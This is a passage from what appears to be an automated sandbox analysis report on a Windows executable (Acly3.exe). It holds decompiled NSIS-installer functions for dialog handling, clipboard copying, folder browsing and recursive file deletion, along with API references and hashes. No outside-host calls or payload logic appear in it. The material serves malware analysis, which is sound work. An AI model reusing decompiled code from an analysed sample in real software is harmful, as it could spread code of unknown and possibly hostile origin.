                                                                              • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                                                                            • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                                            • Opcode Fuzzy Hash: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                                                                            • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403B12() {
                                                                            				void* _t1;
                                                                            				signed int _t6;
                                                                            
                                                                            				_t1 =  *0x40a018; // 0xffffffff
                                                                            				if(_t1 != 0xffffffff) {
                                                                            					CloseHandle(_t1);
                                                                            					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                            					_t6 =  *0x40a018;
                                                                            				}
                                                                            				E00403B57();
                                                                            				return E00405C49(_t6, 0x443000, 7);
                                                                            			}


                                                                            APIs
                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403B1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                                                                            • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                                                                            • Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                                                                            • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            C-Code - Quality: 95%
                                                                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                            				struct HWND__* _v8;
                                                                            				long _v12;
                                                                            				struct tagRECT _v28;
                                                                            				void* _v36;
                                                                            				signed int _v40;
                                                                            				int _v44;
                                                                            				int _v48;
                                                                            				signed int _v52;
                                                                            				int _v56;
                                                                            				void* _v60;
                                                                            				void* _v68;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				struct HWND__* _t94;
                                                                            				long _t95;
                                                                            				int _t100;
                                                                            				void* _t108;
                                                                            				intOrPtr _t130;
                                                                            				struct HWND__* _t134;
                                                                            				int _t156;
                                                                            				int _t159;
                                                                            				struct HMENU__* _t164;
                                                                            				struct HWND__* _t168;
                                                                            				struct HWND__* _t169;
                                                                            				int _t171;
                                                                            				void* _t172;
                                                                            				short* _t173;
                                                                            				short* _t175;
                                                                            				int _t177;
                                                                            
                                                                            				_t169 =  *0x433ee4;
                                                                            				_t156 = 0;
                                                                            				_v8 = _t169;
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 == 0x405) {
                                                                            						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                            					}
                                                                            					if(_a8 != 0x111) {
                                                                            						L17:
                                                                            						_t171 = 1;
                                                                            						if(_a8 != 0x404) {
                                                                            							L25:
                                                                            							if(_a8 != 0x7b) {
                                                                            								goto L20;
                                                                            							}
                                                                            							_t94 = _v8;
                                                                            							if(_a12 != _t94) {
                                                                            								goto L20;
                                                                            							}
                                                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                            							_a8 = _t95;
                                                                            							if(_t95 <= _t156) {
                                                                            								L36:
                                                                            								return 0;
                                                                            							}
                                                                            							_t164 = CreatePopupMenu();
                                                                            							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                            							_t100 = _a16;
                                                                            							_t159 = _a16 >> 0x10;
                                                                            							if(_a16 == 0xffffffff) {
                                                                            								GetWindowRect(_v8,  &_v28);
                                                                            								_t100 = _v28.left;
                                                                            								_t159 = _v28.top;
                                                                            							}
                                                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                            								_v60 = _t156;
                                                                            								_v48 = 0x42d268;
                                                                            								_v44 = 0x1000;
                                                                            								_a4 = _a8;
                                                                            								do {
                                                                            									_a4 = _a4 - 1;
                                                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                            								} while (_a4 != _t156);
                                                                            								OpenClipboard(_t156);
                                                                            								EmptyClipboard();
                                                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                            								_a4 = _t108;
                                                                            								_t172 = GlobalLock(_t108);
                                                                            								do {
                                                                            									_v48 = _t172;
                                                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                            									 *_t173 = 0xd;
                                                                            									_t175 = _t173 + 2;
                                                                            									 *_t175 = 0xa;
                                                                            									_t172 = _t175 + 2;
                                                                            									_t156 = _t156 + 1;
                                                                            								} while (_t156 < _a8);
                                                                            								GlobalUnlock(_a4);
                                                                            								SetClipboardData(0xd, _a4);
                                                                            								CloseClipboard();
                                                                            							}
                                                                            							goto L36;
                                                                            						}
                                                                            						if( *0x433ecc == _t156) {
                                                                            							ShowWindow( *0x434f08, 8);
                                                                            							if( *0x434f8c == _t156) {
                                                                            								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
                                                                            							}
                                                                            							E00404472(_t171);
                                                                            							goto L25;
                                                                            						}
                                                                            						 *0x42ba38 = 2;
                                                                            						E00404472(0x78);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						if(_a12 != 0x403) {
                                                                            							L20:
                                                                            							return E00404500(_a8, _a12, _a16);
                                                                            						}
                                                                            						ShowWindow( *0x433ed0, _t156);
                                                                            						ShowWindow(_t169, 8);
                                                                            						E004044CE(_t169);
                                                                            						goto L17;
                                                                            					}
                                                                            				}
                                                                            				_v52 = _v52 | 0xffffffff;
                                                                            				_v40 = _v40 | 0xffffffff;
                                                                            				_t177 = 2;
                                                                            				_v60 = _t177;
                                                                            				_v56 = 0;
                                                                            				_v48 = 0;
                                                                            				_v44 = 0;
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				_t130 =  *0x434f10;
                                                                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                            				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                            				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                            				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                            				 *0x433ee4 = _t134;
                                                                            				_v8 = _t134;
                                                                            				E004044CE( *0x433ed0);
                                                                            				 *0x433ed4 = E00404E27(4);
                                                                            				 *0x433eec = 0;
                                                                            				GetClientRect(_v8,  &_v28);
                                                                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                            				if(_a8 >= 0) {
                                                                            					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                            					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                            				}
                                                                            				if(_a12 >= _t156) {
                                                                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                            				_push(0x1b);
                                                                            				E00404499(_a4);
                                                                            				if(( *0x434f18 & 0x00000003) != 0) {
                                                                            					ShowWindow( *0x433ed0, _t156);
                                                                            					if(( *0x434f18 & 0x00000002) != 0) {
                                                                            						 *0x433ed0 = _t156;
                                                                            					} else {
                                                                            						ShowWindow(_v8, 8);
                                                                            					}
                                                                            					E004044CE( *0x433ec8);
                                                                            				}
                                                                            				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                            				if(( *0x434f18 & 0x00000004) != 0) {
                                                                            					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                            				}
                                                                            				goto L36;
                                                                            			}

                                                                            0x00405a48
                                                                            0x00405a50
                                                                            0x00405a5b
                                                                            0x00405a61
                                                                            0x00405a61
                                                                            0x00000000
                                                                            0x004059c0
                                                                            0x004058f6
                                                                            0x00405926
                                                                            0x0040592e
                                                                            0x00405939
                                                                            0x00405939
                                                                            0x0040593f
                                                                            0x00000000
                                                                            0x0040593f
                                                                            0x004058fa
                                                                            0x00405904
                                                                            0x00000000
                                                                            0x004058c8
                                                                            0x004058ce
                                                                            0x00405909
                                                                            0x00000000
                                                                            0x00405912
                                                                            0x004058d7
                                                                            0x004058dc
                                                                            0x004058df
                                                                            0x00000000
                                                                            0x004058df
                                                                            0x004058c6
                                                                            0x004056ff
                                                                            0x00405703
                                                                            0x0040570b
                                                                            0x0040570f
                                                                            0x00405712
                                                                            0x00405715
                                                                            0x00405718
                                                                            0x0040571b
                                                                            0x0040571c
                                                                            0x0040571d
                                                                            0x00405736
                                                                            0x00405739
                                                                            0x00405743
                                                                            0x00405752
                                                                            0x0040575a
                                                                            0x00405762
                                                                            0x00405767
                                                                            0x0040576a
                                                                            0x00405776
                                                                            0x0040577f
                                                                            0x00405788
                                                                            0x004057aa
                                                                            0x004057b0
                                                                            0x004057c1
                                                                            0x004057c6
                                                                            0x004057d4
                                                                            0x004057e2
                                                                            0x004057e2
                                                                            0x004057e7
                                                                            0x004057f5
                                                                            0x004057f5
                                                                            0x004057fa
                                                                            0x004057fd
                                                                            0x00405802
                                                                            0x0040580e
                                                                            0x00405817
                                                                            0x00405824
                                                                            0x00405833
                                                                            0x00405826
                                                                            0x0040582b
                                                                            0x0040582b
                                                                            0x0040583f
                                                                            0x0040583f
                                                                            0x00405853
                                                                            0x0040585c
                                                                            0x00405865
                                                                            0x00405875
                                                                            0x00405881
                                                                            0x00405881
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                            • GetClientRect.USER32 ref: 00405788
                                                                            • GetSystemMetrics.USER32 ref: 0040578F
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                            • ShowWindow.USER32(00000000,?), ref: 00405817
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004058B3
                                                                            • ShowWindow.USER32(00000000), ref: 004058D7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                            • ShowWindow.USER32(00000008), ref: 00405926
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                            • CreatePopupMenu.USER32 ref: 0040596B
                                                                            • AppendMenuW.USER32 ref: 0040597F
                                                                            • GetWindowRect.USER32 ref: 0040599F
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                            • EmptyClipboard.USER32 ref: 00405A06
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                            • GlobalLock.KERNEL32 ref: 00405A1C
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                            • SetClipboardData.USER32 ref: 00405A5B
                                                                            • CloseClipboard.USER32 ref: 00405A61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                            • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				long _v16;
                                                                            				long _v20;
                                                                            				long _v24;
                                                                            				char _v28;
                                                                            				intOrPtr _v32;
                                                                            				long _v36;
                                                                            				char _v40;
                                                                            				unsigned int _v44;
                                                                            				signed int _v48;
                                                                            				WCHAR* _v56;
                                                                            				intOrPtr _v60;
                                                                            				intOrPtr _v64;
                                                                            				intOrPtr _v68;
                                                                            				WCHAR* _v72;
                                                                            				void _v76;
                                                                            				struct HWND__* _v80;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr _t82;
                                                                            				long _t87;
                                                                            				short* _t89;
                                                                            				void* _t95;
                                                                            				signed int _t96;
                                                                            				int _t109;
                                                                            				signed short _t114;
                                                                            				signed int _t118;
                                                                            				struct HWND__** _t122;
                                                                            				intOrPtr* _t138;
                                                                            				WCHAR* _t146;
                                                                            				unsigned int _t150;
                                                                            				signed int _t152;
                                                                            				unsigned int _t156;
                                                                            				signed int _t158;
                                                                            				signed int* _t159;
                                                                            				signed int* _t160;
                                                                            				struct HWND__* _t166;
                                                                            				struct HWND__* _t167;
                                                                            				int _t169;
                                                                            				unsigned int _t197;
                                                                            
                                                                            				_t156 = __edx;
                                                                            				_t82 =  *0x42c240;
                                                                            				_v32 = _t82;
                                                                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                            				if(_a8 == 0x40b) {
                                                                            					E00405B81(0x3fb, _t146);
                                                                            					E004067C4(_t146);
                                                                            				}
                                                                            				_t167 = _a4;
                                                                            				if(_a8 != 0x110) {
                                                                            					L8:
                                                                            					if(_a8 != 0x111) {
                                                                            						L20:
                                                                            						if(_a8 == 0x40f) {
                                                                            							L22:
                                                                            							_v8 = _v8 & 0x00000000;
                                                                            							_v12 = _v12 & 0x00000000;
                                                                            							E00405B81(0x3fb, _t146);
                                                                            							if(E00405F14(_t186, _t146) == 0) {
                                                                            								_v8 = 1;
                                                                            							}
                                                                            							E0040653D(0x42b238, _t146);
                                                                            							_t87 = E0040690A(1);
                                                                            							_v16 = _t87;
                                                                            							if(_t87 == 0) {
                                                                            								L30:
                                                                            								E0040653D(0x42b238, _t146);
                                                                            								_t89 = E00405EB7(0x42b238);
                                                                            								_t158 = 0;
                                                                            								if(_t89 != 0) {
                                                                            									 *_t89 = 0;
                                                                            								}
                                                                            								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                            									goto L35;
                                                                            								} else {
                                                                            									_t169 = 0x400;
                                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                            									asm("cdq");
                                                                            									_v48 = _t109;
                                                                            									_v44 = _t156;
                                                                            									_v12 = 1;
                                                                            									goto L36;
                                                                            								}
                                                                            							} else {
                                                                            								_t159 = 0;
                                                                            								if(0 == 0x42b238) {
                                                                            									goto L30;
                                                                            								} else {
                                                                            									goto L26;
                                                                            								}
                                                                            								while(1) {
                                                                            									L26:
                                                                            									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                            									if(_t114 != 0) {
                                                                            										break;
                                                                            									}
                                                                            									if(_t159 != 0) {
                                                                            										 *_t159 =  *_t159 & _t114;
                                                                            									}
                                                                            									_t160 = E00405E58(0x42b238);
                                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                                            									_t159 = _t160;
                                                                            									 *_t159 = 0x5c;
                                                                            									if(_t159 != 0x42b238) {
                                                                            										continue;
                                                                            									} else {
                                                                            										goto L30;
                                                                            									}
                                                                            								}
                                                                            								_t150 = _v44;
                                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                            								_v44 = _t150 >> 0xa;
                                                                            								_v12 = 1;
                                                                            								_t158 = 0;
                                                                            								__eflags = 0;
                                                                            								L35:
                                                                            								_t169 = 0x400;
                                                                            								L36:
                                                                            								_t95 = E00404E27(5);
                                                                            								if(_v12 != _t158) {
                                                                            									_t197 = _v44;
                                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                            										_v8 = 2;
                                                                            									}
                                                                            								}
                                                                            								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                                            									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                            									if(_v12 == _t158) {
                                                                            										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                            									} else {
                                                                            										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                            									}
                                                                            								}
                                                                            								_t96 = _v8;
                                                                            								 *0x434fa4 = _t96;
                                                                            								if(_t96 == _t158) {
                                                                            									_v8 = E0040140B(7);
                                                                            								}
                                                                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                            									_v8 = _t158;
                                                                            								}
                                                                            								E004044BB(0 | _v8 == _t158);
                                                                            								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                            									E004048E3();
                                                                            								}
                                                                            								 *0x42d258 = _t158;
                                                                            								goto L53;
                                                                            							}
                                                                            						}
                                                                            						_t186 = _a8 - 0x405;
                                                                            						if(_a8 != 0x405) {
                                                                            							goto L53;
                                                                            						}
                                                                            						goto L22;
                                                                            					}
                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                            					if(_t118 != 0x3fb) {
                                                                            						L12:
                                                                            						if(_t118 == 0x3e9) {
                                                                            							_t152 = 7;
                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                            							_v80 = _t167;
                                                                            							_v72 = 0x42d268;
                                                                            							_v60 = E00404CE0;
                                                                            							_v56 = _t146;
                                                                            							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                            							_t122 =  &_v80;
                                                                            							_v64 = 0x41;
                                                                            							__imp__SHBrowseForFolderW(_t122);
                                                                            							if(_t122 == 0) {
                                                                            								_a8 = 0x40f;
                                                                            							} else {
                                                                            								__imp__CoTaskMemFree(_t122);
                                                                            								E00405E0C(_t146);
                                                                            								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                            								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                                                                            									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                            									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                            										lstrcatW(_t146, 0x432ea0);
                                                                            									}
                                                                            								}
                                                                            								 *0x42d258 =  *0x42d258 + 1;
                                                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                            							}
                                                                            						}
                                                                            						goto L20;
                                                                            					}
                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                            						goto L53;
                                                                            					}
                                                                            					_a8 = 0x40f;
                                                                            					goto L12;
                                                                            				} else {
                                                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                            					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                            						E00405E0C(_t146);
                                                                            					}
                                                                            					 *0x433ed8 = _t167;
                                                                            					SetWindowTextW(_t166, _t146);
                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                            					_push(1);
                                                                            					E00404499(_t167);
                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                            					_push(0x14);
                                                                            					E00404499(_t167);
                                                                            					E004044CE(_t166);
                                                                            					_t138 = E0040690A(8);
                                                                            					if(_t138 == 0) {
                                                                            						L53:
                                                                            						return E00404500(_a8, _a12, _a16);
                                                                            					} else {
                                                                            						 *_t138(_t166, 1);
                                                                            						goto L8;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                            • SetWindowTextW.USER32 ref: 00404A03
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,0042D268,00000000,?,?), ref: 00404AF1
                                                                            • lstrcatW.KERNEL32 ref: 00404AFD
                                                                            • SetDlgItemTextW.USER32 ref: 00404B0F
                                                                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406827
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406836
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 0040683B
                                                                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?), ref: 0040684E
                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                            • MulDiv.KERNEL32 ref: 00404BED
                                                                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                            • API String ID: 2624150263-3065053676
                                                                            • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                            • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				short _v556;
                                                                            				short _v558;
                                                                            				struct _WIN32_FIND_DATAW _v604;
                                                                            				signed int _t38;
                                                                            				signed int _t52;
                                                                            				signed int _t55;
                                                                            				signed int _t62;
                                                                            				void* _t64;
                                                                            				signed char _t65;
                                                                            				WCHAR* _t66;
                                                                            				void* _t67;
                                                                            				WCHAR* _t68;
                                                                            				void* _t70;
                                                                            
                                                                            				_t65 = _a8;
                                                                            				_t68 = _a4;
                                                                            				_v8 = _t65 & 0x00000004;
                                                                            				_t38 = E00405F14(__eflags, _t68);
                                                                            				_v12 = _t38;
                                                                            				if((_t65 & 0x00000008) != 0) {
                                                                            					_t62 = DeleteFileW(_t68);
                                                                            					asm("sbb eax, eax");
                                                                            					_t64 =  ~_t62 + 1;
                                                                            					 *0x434f88 =  *0x434f88 + _t64;
                                                                            					return _t64;
                                                                            				}
                                                                            				_a4 = _t65;
                                                                            				_t8 =  &_a4;
                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                            				__eflags =  *_t8;
                                                                            				if( *_t8 == 0) {
                                                                            					L5:
                                                                            					E0040653D(0x42f270, _t68);
                                                                            					__eflags = _a4;
                                                                            					if(_a4 == 0) {
                                                                            						E00405E58(_t68);
                                                                            					} else {
                                                                            						lstrcatW(0x42f270, L"\\*.*");
                                                                            					}
                                                                            					__eflags =  *_t68;
                                                                            					if( *_t68 != 0) {
                                                                            						L10:
                                                                            						lstrcatW(_t68, 0x40a014);
                                                                            						L11:
                                                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                            						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                                            						_t70 = _t38;
                                                                            						__eflags = _t70 - 0xffffffff;
                                                                            						if(_t70 == 0xffffffff) {
                                                                            							L26:
                                                                            							__eflags = _a4;
                                                                            							if(_a4 != 0) {
                                                                            								_t30 = _t66 - 2;
                                                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                            								__eflags =  *_t30;
                                                                            							}
                                                                            							goto L28;
                                                                            						} else {
                                                                            							goto L12;
                                                                            						}
                                                                            						do {
                                                                            							L12:
                                                                            							__eflags = _v604.cFileName - 0x2e;
                                                                            							if(_v604.cFileName != 0x2e) {
                                                                            								L16:
                                                                            								E0040653D(_t66,  &(_v604.cFileName));
                                                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                            								if(__eflags == 0) {
                                                                            									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                            									__eflags = _t52;
                                                                            									if(_t52 != 0) {
                                                                            										E0040559F(0xfffffff2, _t68);
                                                                            									} else {
                                                                            										__eflags = _v8 - _t52;
                                                                            										if(_v8 == _t52) {
                                                                            											 *0x434f88 =  *0x434f88 + 1;
                                                                            										} else {
                                                                            											E0040559F(0xfffffff1, _t68);
                                                                            											E004062FD(_t67, _t68, 0);
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                            									if(__eflags == 0) {
                                                                            										E00405C49(__eflags, _t68, _a8);
                                                                            									}
                                                                            								}
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _v558;
                                                                            							if(_v558 == 0) {
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _v558 - 0x2e;
                                                                            							if(_v558 != 0x2e) {
                                                                            								goto L16;
                                                                            							}
                                                                            							__eflags = _v556;
                                                                            							if(_v556 == 0) {
                                                                            								goto L24;
                                                                            							}
                                                                            							goto L16;
                                                                            							L24:
                                                                            							_t55 = FindNextFileW(_t70,  &_v604);
                                                                            							__eflags = _t55;
                                                                            						} while (_t55 != 0);
                                                                            						_t38 = FindClose(_t70);
                                                                            						goto L26;
                                                                            					}
                                                                            					__eflags =  *0x42f270 - 0x5c;
                                                                            					if( *0x42f270 != 0x5c) {
                                                                            						goto L11;
                                                                            					}
                                                                            					goto L10;
                                                                            				} else {
                                                                            					__eflags = _t38;
                                                                            					if(_t38 == 0) {
                                                                            						L28:
                                                                            						__eflags = _a4;
                                                                            						if(_a4 == 0) {
                                                                            							L36:
                                                                            							return _t38;
                                                                            						}
                                                                            						__eflags = _v12;
                                                                            						if(_v12 != 0) {
                                                                            							_t38 = E00406873(_t68);
                                                                            							__eflags = _t38;
                                                                            							if(_t38 == 0) {
                                                                            								goto L36;
                                                                            							}
                                                                            							E00405E0C(_t68);
                                                                            							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                            							__eflags = _t38;
                                                                            							if(_t38 != 0) {
                                                                            								return E0040559F(0xffffffe5, _t68);
                                                                            							}
                                                                            							__eflags = _v8;
                                                                            							if(_v8 == 0) {
                                                                            								goto L30;
                                                                            							}
                                                                            							E0040559F(0xfffffff1, _t68);
                                                                            							return E004062FD(_t67, _t68, 0);
                                                                            						}
                                                                            						L30:
                                                                            						 *0x434f88 =  *0x434f88 + 1;
                                                                            						return _t38;
                                                                            					}
